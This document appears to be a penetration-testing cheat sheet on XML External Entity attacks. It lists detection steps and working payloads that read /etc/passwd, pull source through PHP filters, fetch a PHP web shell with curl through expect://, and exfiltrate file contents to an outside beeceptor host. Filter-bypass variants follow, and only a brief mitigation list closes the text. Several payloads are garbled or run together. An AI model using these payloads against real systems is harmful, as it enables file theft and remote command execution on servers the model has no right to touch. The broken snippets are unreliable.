Identify XML User Input: Look for web pages or forms that accept XML input from users. This can include forms that submit data in XML format to the server.
Inspect Input Filtering and Sanitization: Check if the application applies proper input filtering or sanitization to XML input. Lack of filtering or sanitization increases the risk of XXE vulnerabilities.
Observe Response Handling: Pay attention to how the application handles user input in the response. If the application reflects XML elements back to the user without encoding, it may be vulnerable to XXE.
Analyze DTD Declaration: Determine if the XML input includes a Document Type Definition (DTD) declaration. If present, it may allow for entity declaration and expansion, leading to XXE.
Add Custom Entity: Inject a custom entity into the XML input to test for XXE. This can be done by adding a DTD declaration and defining a new entity within it.
Test Entity Replacement: Verify if the application replaces the custom entity with its defined value in the response. If the value of the entity is reflected back, it indicates potential XXE vulnerability.
Check Content-Type: Even if the application primarily uses JSON format, try changing the Content-Type header to application/XML. Some applications may accept XML data even if they primarily handle JSON.
Convert JSON to XML: If necessary, convert JSON data to XML format using online tools. Submit the XML data to the application and test for XXE vulnerabilities as described above.
Error Based XXE
Read File
<!--Linux --><?xml version="1.0"?><!DOCTYPE hacktor [<!ENTITY read SYSTEM "file:///etc/passwd">]><check> <proid>&read;</proid></check>
Blind Data Exfiltration
PHP Filter
<?xml version="1.0"?><!DOCTYPE hacktor [<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=/index.php"> ]><Check><proid>&read;</proid></Check>
Code Execution
PHP Wrapper expect://ls
echo'<?php system($_REQUEST['cmd'])?>'>shell.php#up server python3-mhttp.server80
to execute
<?xml version="1.0"?><!DOCTYPE email [ <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'https://h3ckt00r.free.beeceptor.com/shell.php'">]><root><name></name><tel></tel><email>&company;</email><message></message></root>
The expect module is not enabled/installed on modern PHP servers by default, so this attack may not always work.
<!DOCTYPE h3ckt00r [ <!ENTITY % read SYSTEM "php://filter/convert.base64-encode/resource=file:///etc/passwd" > ]><!ENTITY % test "<!ENTITY % snedfile SYSTEM 'https://h3ckt00r.free.beeceptor.com/?x=%read;'>">%test;%sendfile;
Automated OOB Exfiltration
0xN1ghtM4r3@htb[/htb]$rubyXXEinjector.rb--host=127.0.0.1--httpport=8000--file=/tmp/xxe.req--path=/etc/passwd--oob=http--phpfilter...SNIP...[+] Sending a request with malicious XML.[+] Responding with XML for: /etc/passwd[+] Retrieved data:
How to Find XEE
● XML file upload (e.g config files)
● XML input fields
● XML based APIs
● XML based files (RSS, SVG)
how to bypass if filters " ENTITY " word
Case1: Manipulation (Uppercase/Lowercase)
<!eNtItY h3ckt00r SYSTEM "file:///etc/passwd">
Case2: Encoding
HTML encoding:
<!ENTITY h3ckt00r SYSTEM "file:///etc/passwd"><!-- e -> E -->
Hexadecimal enconding
<!ENTITY h3ckt00r SYSTEM "file:///etc/passwd"><!-- e -> E -->
Whitespace Bypasses (Extra Spaces or Newlines) Or using Comment
<!EN TITY h3ckt00r SYSTEM "file:///etc/passwd"><!-- OR --><!ENTITY h3ckt00r SYSTEM "file:///etc/passwd"><!-- OR using Comment --><!E<!-- Comment -->NTITY xxe SYSTEM "file:///etc/passwd">
CDATA
<!DOCTYPE root [ <!ENTITY % data "<![CDATA[ENTITY]]"> %data;]>
How TO Test XXE Methodology
Find XXE Data Entry Point
Change the XML object to anything.
Try to declare a reference entity or parameter entity. <!DOCTYPE hacktor [ <!ENTITY xxe SYSTEM "Hello">]>
test Blind get server and add reference
if now XML format test Xinclude
Mitigation and Prevention
Avoiding Outdated Components
Using Safe XML Configurations
Disable referencing custom Document Type Definitions (DTDs)